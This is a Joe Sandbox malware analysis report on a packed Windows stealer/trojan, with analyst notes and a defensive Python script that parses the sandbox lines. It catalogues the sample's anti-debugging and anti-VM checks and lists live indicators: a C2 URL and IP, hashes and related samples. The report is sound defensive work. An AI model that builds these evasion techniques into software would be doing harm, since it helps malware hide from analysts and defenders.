Source: EwhnoHx0n5.exe, 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Note: the string above reads like the key set of a host profile (Num_processor, Num_ram, drivers, Num_displays, resolution_x/y, recent_files, processes, uptime_minutes, installed_apps) interleaved with the names of the checks it runs (vbox_first, vbox_second, public_check, dbg, dbg_sec, dbg_third), which suggests the VM and debugger results are reported back alongside the profile rather than used only to abort. The VBox*.dll, VBoxSF, WINDBG.EXE, wireshark.exe, procmon.exe, x64dbg.exe and ida.exe items are the concrete artefacts those checks look for.
Source: EwhnoHx0n5.exe, 00000000.00000002.1511357906.0000000000CB0000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Note: Oreans.vxd and Software\WinLicense are strings of the Oreans WinLicense protector runtime, so the ACPI DSDT VBOX__ check and the RDTSC, self-modifying-code and hidden-thread hits in this report may originate from the protection layer rather than from the payload itself; the payload's own checks are the ones named in the profile string above.
Source: EwhnoHx0n5.exe, 00000000.00000003.1394830466.0000000001812000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlla
Source: EwhnoHx0n5.exe, 00000000.00000003.1501495234.000000000183D000.00000004.00000020.00020000.00000000.sdmp, EwhnoHx0n5.exe, 00000000.00000002.1513086082.000000000187F000.00000004.00000020.00020000.00000000.sdmp, EwhnoHx0n5.exe, 00000000.00000003.1502012683.000000000187E000.00000004.00000020.00020000.00000000.sdmp, EwhnoHx0n5.exe, 00000000.00000003.1501735272.0000000001862000.00000004.00000020.00020000.00000000.sdmp, EwhnoHx0n5.exe, 00000000.00000003.1501782053.000000000186F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Note: "Hyper-V RAW" next to mswsock.dll is the name of a standard Winsock service provider that is loaded on every Windows 10 host when a socket is created; on its own it is not evidence of a hypervisor check.
Source: EwhnoHx0n5.exe, 00000000.00000003.1398157440.0000000006A21000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFlO#
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Thread information set: HideFromDebugger (NtSetInformationThread with ThreadHideFromDebugger: the thread stops delivering debug events to an attached debugger, so breakpoints in it silently kill the process)
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Note: the window titles and class names above are those of Sysinternals Regmon, Filemon and Process Monitor and of OllyDbg (gbdyllo is an OllyDbg window class); they are looked up with FindWindow-style calls, so renaming the tool's window class defeats this check.
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | File opened: NTICE
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | File opened: SICE
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | File opened: SIWVID
Note: \\.\NTICE, \\.\SICE and \\.\SIWVID are the device names of the SoftICE kernel debugger; a successful CreateFile on any of them means the debugger driver is loaded. This is a legacy check that no longer fires on modern analysis hosts.
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Process queried: DebugPort (3 times; NtQueryInformationProcess with ProcessDebugPort, non-zero when a debugger is attached)
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: 0_2_00639980 rdtsc 0_2_00639980
Source: EwhnoHx0n5.exe, EwhnoHx0n5.exe, 00000000.00000002.1511357906.0000000000CB0000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: K9Program Manager ("Program Manager" is the title of the Windows shell's Progman window; its absence is a common tell for a headless or non-interactive session)
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation (4 times)
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid (commonly read as a stable per-host victim identifier)
Source: EwhnoHx0n5.exe, 00000000.00000003.1364654602.0000000007420000.00000004.00001000.00020000.00000000.sdmp, EwhnoHx0n5.exe, 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: procmon.exe
Source: EwhnoHx0n5.exe, 00000000.00000003.1364654602.0000000007420000.00000004.00001000.00020000.00000000.sdmp, EwhnoHx0n5.exe, 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: wireshark.exe

Stealing of Sensitive Information

Source: Signature Results | Signatures: Mutex created, HTTP post and idle behavior
Source: global traffic | TCP traffic: 192.168.2.9:49727 -> 5.101.3.217:80
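The evasion lines of the two sections above and the network lines here can be turned into a compact profile with the following Python script, an added example that is not Joe Sandbox code. It recognises behaviour lines by the signature names the report prints (so the missing separator between the source path and the signature name in this extraction does not matter), maps window class names, device names, registry values and memory strings to the tool or VM product they probe for, collects the TCP destination, and splits the beacon URL into host, path token and query. The eleven REPORT_LINES and C2_URL are copied from this report; the lookup tables are supplied by this example, not by the report; and decoding the ten trailing digits of the path as a Unix timestamp is labelled a hypothesis in the code because nothing on this page confirms it.

```python
"""Profile the anti-analysis and network artefacts in Joe Sandbox behaviour lines
(added example, not Joe Sandbox code). Lines are recognised by the signature name
the report prints, so the missing separator between the source path and the
signature name in the extracted text does not matter."""
import re
from datetime import datetime, timezone
from urllib.parse import urlsplit

SIGNATURES = ["Open window title or class name", "File opened", "Thread information set",
              "Process queried", "Registry key queried", "Key value queried",
              "Binary or memory string", "TCP traffic"]
LINE = re.compile(r"^Source:\s*(?P<src>.*?)\s*\|?\s*(?P<sig>" +
                  "|".join(map(re.escape, SIGNATURES)) + r"):\s*(?P<detail>.*)$")
# Lookup tables supplied by this example: window classes/titles and process names of analysis tools.
TOOL_WINDOWS = {
    "ollydbg": "OllyDbg", "gbdyllo": "OllyDbg",
    "procmon_window_class": "Process Monitor",
    "process monitor - sysinternals: www.sysinternals.com": "Process Monitor",
    "regmonclass": "Regmon", "registry monitor - sysinternals: www.sysinternals.com": "Regmon",
    "filemonclass": "Filemon", "file monitor - sysinternals: www.sysinternals.com": "Filemon",
}
TOOL_PROCESSES = ("procmon.exe", "wireshark.exe", "x64dbg.exe", "ida.exe", "WINDBG.EXE")
SOFTICE_DEVICES = {"NTICE", "SICE", "SIWVID"}        # opened as \\.\NTICE etc.
VM_REGISTRY_VALUES = {"SystemBiosVersion", "VideoBiosVersion", "DriverDesc"}
VM_STRINGS = ("VBOX__", "VBoxSF", "VBox*.dll")


def parse_line(line):
    """(source, signature, detail) or None; drops the 'Jump to behavior' link text."""
    m = LINE.match(line.strip())
    if not m:
        return None
    return m["src"], m["sig"], m["detail"].replace("Jump to behavior", "").strip()


def build_profile(lines):
    """Group behaviour lines into evasion categories and network indicators."""
    p = {"anti_debug": set(), "anti_vm": set(), "tool_scan": set(), "host_id": set(), "tcp": set()}
    for line in lines:
        parsed = parse_line(line)
        if not parsed:
            continue
        _, sig, detail = parsed
        if sig == "Open window title or class name":
            p["tool_scan"].add(TOOL_WINDOWS.get(detail.lower(), "unknown window: " + detail))
        elif sig == "File opened" and detail in SOFTICE_DEVICES:
            p["anti_debug"].add("SoftICE device \\\\.\\" + detail)
        elif sig == "Thread information set" and "HideFromDebugger" in detail:
            p["anti_debug"].add("NtSetInformationThread(ThreadHideFromDebugger)")
        elif sig == "Process queried" and "DebugPort" in detail:
            p["anti_debug"].add("NtQueryInformationProcess(ProcessDebugPort)")
        elif sig == "Registry key queried":
            name = detail.rsplit("name:", 1)[-1].strip()
            if name in VM_REGISTRY_VALUES:
                p["anti_vm"].add("registry " + name)
        elif sig == "Key value queried" and "MachineGuid" in detail:
            p["host_id"].add("HKLM\\SOFTWARE\\Microsoft\\Cryptography\\MachineGuid")
        elif sig == "Binary or memory string":
            p["anti_vm"].update(s for s in VM_STRINGS if s in detail)
            p["tool_scan"].update(t for t in TOOL_PROCESSES if t in detail)
        elif sig == "TCP traffic":
            m = re.search(r"->\s*([\d.]+):(\d+)", detail)
            if m:
                p["tcp"].add((m[1], int(m[2])))
    p["evasion_categories"] = sum(bool(p[k]) for k in ("anti_debug", "anti_vm", "tool_scan"))
    return p


def c2_indicators(url):
    """Split the beacon URL into matchable parts. Decoding the 10-digit tail as a
    Unix epoch is a hypothesis to check against other samples, not a fact."""
    u = urlsplit(url)
    m = re.fullmatch(r"([A-Za-z]+)(\d{10})", u.path.rsplit("/", 1)[-1])
    out = {"host": u.hostname, "path": u.path, "query": u.query, "token": None, "epoch_hint": None}
    if m:
        out["token"] = m[1]
        out["epoch_hint"] = datetime.fromtimestamp(int(m[2]), tz=timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")
    return out


# Behaviour lines copied from the report (a constructed subset) and the beacon URL
# from its contacted-URL table.
REPORT_LINES = [
    r"Source: C:\Users\user\Desktop\EwhnoHx0n5.exeThread information set: HideFromDebuggerJump to behavior",
    r"Source: C:\Users\user\Desktop\EwhnoHx0n5.exeOpen window title or class name: ollydbg",
    r"Source: C:\Users\user\Desktop\EwhnoHx0n5.exeOpen window title or class name: procmon_window_class",
    r"Source: C:\Users\user\Desktop\EwhnoHx0n5.exeOpen window title or class name: regmonclass",
    r"Source: C:\Users\user\Desktop\EwhnoHx0n5.exeFile opened: SICE",
    r"Source: C:\Users\user\Desktop\EwhnoHx0n5.exeProcess queried: DebugPortJump to behavior",
    r"Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior",
    r"Source: EwhnoHx0n5.exe, 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF",
    r"Source: EwhnoHx0n5.exe, 00000000.00000003.1364654602.0000000007420000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: wireshark.exe",
    r"Source: C:\Users\user\Desktop\EwhnoHx0n5.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior",
    r"Source: global trafficTCP traffic: 192.168.2.9:49727 -> 5.101.3.217:80",
]
C2_URL = "http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0"
```

For this report the epoch hint decodes to 2024-12-26T04:21:02Z, about a day before the analysis started, and the eight associated samples listed at the end of the report carry the identical path, so the suffix is at least not per-victim; whether it is a build or campaign stamp remains a lead to confirm elsewhere. The TCP destination on port 80 together with the "HTTP GET or POST without a user agent" signature is the combination to pivot on in proxy logs.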
MITRE ATT&CK matrix, techniques with hits (signature count in parentheses; matrix cells without a count were unpopulated and are omitted):
Execution: Command and Scripting Interpreter (2)
Persistence: DLL Side-Loading (1)
Privilege Escalation: Process Injection (1); DLL Side-Loading (1)
Defense Evasion: Virtualization/Sandbox Evasion (23); Process Injection (1); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Software Packing (12); DLL Side-Loading (1)
Discovery: Security Software Discovery (751); Virtualization/Sandbox Evasion (23); Process Discovery (13); Remote System Discovery (1); File and Directory Discovery (1); System Information Discovery (216)
Lateral Movement: Exploitation of Remote Services (1)
Collection: Archive Collected Data (11); Data from Local System (1)
Command and Control: Encrypted Channel (11); Ingress Tool Transfer (4); Non-Application Layer Protocol (4); Application Layer Protocol (5)
Reconnaissance, Resource Development, Initial Access, Credential Access, Exfiltration, Impact: no techniques populated

Antivirus detection of the submitted sample
Source | Detection | Scanner | Label
EwhnoHx0n5.exe | 58% | Virustotal |
EwhnoHx0n5.exe | 58% | ReversingLabs | Win32.Ransomware.Generic
EwhnoHx0n5.exe | 100% | Avira | TR/Crypt.TPM.Gen
EwhnoHx0n5.exe | 100% | Joe Sandbox ML |
No Antivirus matches (dropped files, unpacked files and domains)
URL scan results
Source | Detection | Scanner | Label
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF173518686235a1 | 0% | Avira URL Cloud | safe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxS | 0% | Avira URL Cloud | safe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17 | 0% | Avira URL Cloud | safe
http://home.fiveth5ht.top/OyKvQ | 0% | Avira URL Cloud | safe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17351868626963 | 0% | Avira URL Cloud | safe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0 | 0% | Avira URL Cloud | safe
Domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
s-part-0035.t-0009.t-msedge.net | 13.107.246.63 | true | false | | high (Microsoft background traffic; this IP is in the whitelisted list under the cookbook comments below)
home.fiveth5ht.top | 5.101.3.217 | true | false | | high
httpbin.org | 3.218.7.103 | true | false | | high
Contacted URLs
Name | Malicious | Antivirus Detection | Reputation
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0 | true | Avira URL Cloud: safe | unknown
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862 | false | | high
https://httpbin.org/ip | false | | high
Note: httpbin.org/ip echoes the caller's public IP address, a common way for a stealer to learn the victim's external address before reporting in; the "high" reputation of the legitimate service does not make the request benign.
URLs found in process memory and binary data
Name | Source | Malicious | Antivirus Detection | Reputation
https://curl.se/docs/hsts.html | EwhnoHx0n5.exe, 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://home.fiveth5ht.top/OyKvQ | EwhnoHx0n5.exe, EwhnoHx0n5.exe, 00000000.00000003.1501495234.000000000183D000.00000004.00000020.00020000.00000000.sdmp, EwhnoHx0n5.exe, 00000000.00000002.1513066936.0000000001871000.00000004.00000020.00020000.00000000.sdmp, EwhnoHx0n5.exe, 00000000.00000003.1501735272.0000000001862000.00000004.00000020.00020000.00000000.sdmp, EwhnoHx0n5.exe, 00000000.00000003.1501782053.000000000186F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17 | EwhnoHx0n5.exe, 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmp | false | Avira URL Cloud: safe | unknown
http://html4/loose.dtd | EwhnoHx0n5.exe, 00000000.00000003.1364654602.0000000007420000.00000004.00001000.00020000.00000000.sdmp, EwhnoHx0n5.exe, 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmp | false | | high
https://curl.se/docs/alt-svc.html# | EwhnoHx0n5.exe | false | | high
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF173518686235a1 | EwhnoHx0n5.exe, 00000000.00000003.1502602520.0000000001808000.00000004.00000020.00020000.00000000.sdmp, EwhnoHx0n5.exe, 00000000.00000002.1512556245.000000000180A000.00000004.00000020.00020000.00000000.sdmp, EwhnoHx0n5.exe, 00000000.00000003.1502584859.0000000001803000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://httpbin.org/ipbefore | EwhnoHx0n5.exe, 00000000.00000003.1364654602.0000000007420000.00000004.00001000.00020000.00000000.sdmp, EwhnoHx0n5.exe, 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmp | false | | high
https://curl.se/docs/http-cookies.html | EwhnoHx0n5.exe, EwhnoHx0n5.exe, 00000000.00000003.1364654602.0000000007420000.00000004.00001000.00020000.00000000.sdmp, EwhnoHx0n5.exe, 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmp | false | | high
https://curl.se/docs/hsts.html# | EwhnoHx0n5.exe | false | | high
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxS | EwhnoHx0n5.exe, 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmp | false | Avira URL Cloud: safe | unknown
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17351868626963 | EwhnoHx0n5.exe, 00000000.00000003.1502602520.0000000001808000.00000004.00000020.00020000.00000000.sdmp, EwhnoHx0n5.exe, 00000000.00000002.1512556245.000000000180A000.00000004.00000020.00020000.00000000.sdmp, EwhnoHx0n5.exe, 00000000.00000003.1502584859.0000000001803000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://curl.se/docs/http-cookies.html# | EwhnoHx0n5.exe | false | | high
https://curl.se/docs/alt-svc.html | EwhnoHx0n5.exe, 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://.css | EwhnoHx0n5.exe, 00000000.00000003.1364654602.0000000007420000.00000004.00001000.00020000.00000000.sdmp, EwhnoHx0n5.exe, 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://.jpg | EwhnoHx0n5.exe, 00000000.00000003.1364654602.0000000007420000.00000004.00001000.00020000.00000000.sdmp, EwhnoHx0n5.exe, 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmp | false | | high
Note: the curl.se documentation links are warning-message strings of a statically linked libcurl, and http://.css, http://.jpg and http://html4/loose.dtd are string-carving fragments rather than contacted URLs. The truncated and overlapping home.fiveth5ht.top entries (/OyKvQ, ...XF17, ...35a1, ...6963, the two URLs run together) are the same carving effect on the single beacon URL seen in the contacted-URL table; the only indicator worth extracting from this table is that URL.
Contacted IPs
IP | Domain | Country | ASN | ASN Name | Malicious
5.101.3.217 | home.fiveth5ht.top | Russian Federation | 34665 | PINDC-AS, RU | false
3.218.7.103 | httpbin.org | United States | 14618 | AMAZON-AES, US | false
                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1581252
                                Start date and time:2024-12-27 09:06:44 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 5m 7s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 5
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:EwhnoHx0n5.exe
                                renamed because original name is a hash value
                                Original Sample Name:4c88ff06e9f5d8aaf6b642eb809dd2ff.exe
                                Detection:MAL
                                Classification:mal100.troj.spyw.evad.winEXE@1/0@8/2
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:Failed
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Stop behavior analysis, all processes terminated
                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                                • Excluded IPs from analysis (whitelisted): 13.107.246.63, 52.149.20.212
                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                No simulations
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
5.101.3.217 | PqHnYMj5eF.exe | Get hash | malicious | Unknown | Browse | home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
5.101.3.217 | qZA8AyGxiA.exe | Get hash | malicious | Unknown | Browse | home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
5.101.3.217 | 4o4t8dO4r1.exe | Get hash | malicious | Unknown | Browse | home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
5.101.3.217 | xXe4fTmV2h.exe | Get hash | malicious | Unknown | Browse | home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
5.101.3.217 | lolvgcpX19.exe | Get hash | malicious | Unknown | Browse | home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
5.101.3.217 | w6cYYyWXqJ.exe | Get hash | malicious | Unknown | Browse | home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
5.101.3.217 | mBr65h6L4w.exe | Get hash | malicious | Unknown | Browse | home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
5.101.3.217 | HrIrtCXI3s.exe | Get hash | malicious | Unknown | Browse | home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
3.218.7.103 | PqHnYMj5eF.exe | Get hash | malicious | Unknown | Browse |
3.218.7.103 | YrxiR3yCLm.exe | Get hash | malicious | LummaC | Browse |
3.218.7.103 | qZA8AyGxiA.exe | Get hash | malicious | Unknown | Browse |
3.218.7.103 | Cph7VEeu1r.exe | Get hash | malicious | LummaC | Browse |
3.218.7.103 | DRWgoZo325.exe | Get hash | malicious | LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, Vidar | Browse |
3.218.7.103 | xXe4fTmV2h.exe | Get hash | malicious | Unknown | Browse |
3.218.7.103 | lolvgcpX19.exe | Get hash | malicious | Unknown | Browse |
3.218.7.103 | w6cYYyWXqJ.exe | Get hash | malicious | Unknown | Browse |
3.218.7.103 | E6rBvcWFWu.exe | Get hash | malicious | Unknown | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
httpbin.org | PqHnYMj5eF.exe | Get hash | malicious | Unknown | Browse | 3.218.7.103
httpbin.org | YrxiR3yCLm.exe | Get hash | malicious | LummaC | Browse | 3.218.7.103
httpbin.org | qZA8AyGxiA.exe | Get hash | malicious | Unknown | Browse | 3.218.7.103
httpbin.org | Cph7VEeu1r.exe | Get hash | malicious | LummaC | Browse | 3.218.7.103
httpbin.org | 3stIhG821a.exe | Get hash | malicious | LummaC | Browse | 34.226.108.155
httpbin.org | 4o4t8dO4r1.exe | Get hash | malicious | Unknown | Browse | 34.226.108.155
httpbin.org | xXe4fTmV2h.exe | Get hash | malicious | Unknown | Browse | 3.218.7.103
httpbin.org | lolvgcpX19.exe | Get hash | malicious | Unknown | Browse | 3.218.7.103
httpbin.org | 8wiUGtm9UM.exe | Get hash | malicious | LummaC | Browse | 34.226.108.155
httpbin.org | w6cYYyWXqJ.exe | Get hash | malicious | Unknown | Browse | 3.218.7.103
home.fiveth5ht.top | PqHnYMj5eF.exe | Get hash | malicious | Unknown | Browse | 5.101.3.217
home.fiveth5ht.top | qZA8AyGxiA.exe | Get hash | malicious | Unknown | Browse | 5.101.3.217
home.fiveth5ht.top | 4o4t8dO4r1.exe | Get hash | malicious | Unknown | Browse | 5.101.3.217
home.fiveth5ht.top | xXe4fTmV2h.exe | Get hash | malicious | Unknown | Browse | 5.101.3.217
home.fiveth5ht.top | lolvgcpX19.exe | Get hash | malicious | Unknown | Browse | 5.101.3.217
home.fiveth5ht.top | w6cYYyWXqJ.exe | Get hash | malicious | Unknown | Browse | 5.101.3.217
home.fiveth5ht.top | mBr65h6L4w.exe | Get hash | malicious | Unknown | Browse | 5.101.3.217
home.fiveth5ht.top | HrIrtCXI3s.exe | Get hash | malicious | Unknown | Browse | 5.101.3.217
s-part-0035.t-0009.t-msedge.net | onaUtwpiyq.exe | Get hash | malicious | LummaC | Browse | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | CAo57G5Cio.exe | Get hash | malicious | LummaC | Browse | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | wJtkC63Spw.exe | Get hash | malicious | LummaC | Browse | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | qZA8AyGxiA.exe | Get hash | malicious | Unknown | Browse | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | ZvHSpovhDw.exe | Get hash | malicious | LummaC | Browse | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | 60Zxcx88Uv.exe | Get hash | malicious | Unknown | Browse | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | 7jKx8dPOEs.exe | Get hash | malicious | LummaC | Browse | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | 1fi2LiofgW.exe | Get hash | malicious | Unknown | Browse | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | zi042476Iv.exe | Get hash | malicious | LummaC | Browse | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | 54861 Proforma Invoice AMC2273745.xlam.xlsx | Get hash | malicious | Unknown | Browse | 13.107.246.63
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
PINDC-ASRU | PqHnYMj5eF.exe | Get hash | malicious | Unknown | Browse | 5.101.3.217
PINDC-ASRU | qZA8AyGxiA.exe | Get hash | malicious | Unknown | Browse | 5.101.3.217
PINDC-ASRU | 4o4t8dO4r1.exe | Get hash | malicious | Unknown | Browse | 5.101.3.217
PINDC-ASRU | xXe4fTmV2h.exe | Get hash | malicious | Unknown | Browse | 5.101.3.217
PINDC-ASRU | lolvgcpX19.exe | Get hash | malicious | Unknown | Browse | 5.101.3.217
PINDC-ASRU | w6cYYyWXqJ.exe | Get hash | malicious | Unknown | Browse | 5.101.3.217
PINDC-ASRU | mBr65h6L4w.exe | Get hash | malicious | Unknown | Browse | 5.101.3.217
PINDC-ASRU | HrIrtCXI3s.exe | Get hash | malicious | Unknown | Browse | 5.101.3.217
PINDC-ASRU | 6ufJvua5w2.exe | Get hash | malicious | CryptOne, Stealc, Vidar | Browse | 91.215.85.11
PINDC-ASRU | Ransomware Mallox.exe | Get hash | malicious | Targeted Ransomware | Browse | 91.215.85.142
AMAZON-AESUS | PqHnYMj5eF.exe | Get hash | malicious | Unknown | Browse | 3.218.7.103
AMAZON-AESUS | YrxiR3yCLm.exe | Get hash | malicious | LummaC | Browse | 3.218.7.103
AMAZON-AESUS | qZA8AyGxiA.exe | Get hash | malicious | Unknown | Browse | 3.218.7.103
AMAZON-AESUS | Cph7VEeu1r.exe | Get hash | malicious | LummaC | Browse | 3.218.7.103
AMAZON-AESUS | 3stIhG821a.exe | Get hash | malicious | LummaC | Browse | 34.226.108.155
AMAZON-AESUS | DRWgoZo325.exe | Get hash | malicious | LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, Vidar | Browse | 3.218.7.103
AMAZON-AESUS | 4o4t8dO4r1.exe | Get hash | malicious | Unknown | Browse | 34.226.108.155
AMAZON-AESUS | xXe4fTmV2h.exe | Get hash | malicious | Unknown | Browse | 3.218.7.103
AMAZON-AESUS | lolvgcpX19.exe | Get hash | malicious | Unknown | Browse | 3.218.7.103
AMAZON-AESUS | 8wiUGtm9UM.exe | Get hash | malicious | LummaC | Browse | 34.226.108.155
                                                  No context
                                                  No context
                                                  No created / dropped files found
                                                  File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                  Entropy (8bit):7.985915457280148
                                                  TrID:
                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                  • DOS Executable Generic (2002/1) 0.02%
                                                  • VXD Driver (31/22) 0.00%
                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                  File name:EwhnoHx0n5.exe
                                                  File size:4'462'592 bytes
                                                  MD5:4c88ff06e9f5d8aaf6b642eb809dd2ff
                                                  SHA1:08af05a701deb7cb5863567cf8a63bfce814c07d
                                                  SHA256:8fa7158a6212803480850dec0236641a4a249216778d0cef9a1d82738566af98
                                                  SHA512:3709f76fc1f8c25c705e9325f914f5ae7b87d35b3136c28c3cc427eceba946d47a353baa0d8cc4a0c85eb61e37ffad4c478704cf437dc0b3adaa912793dcc581
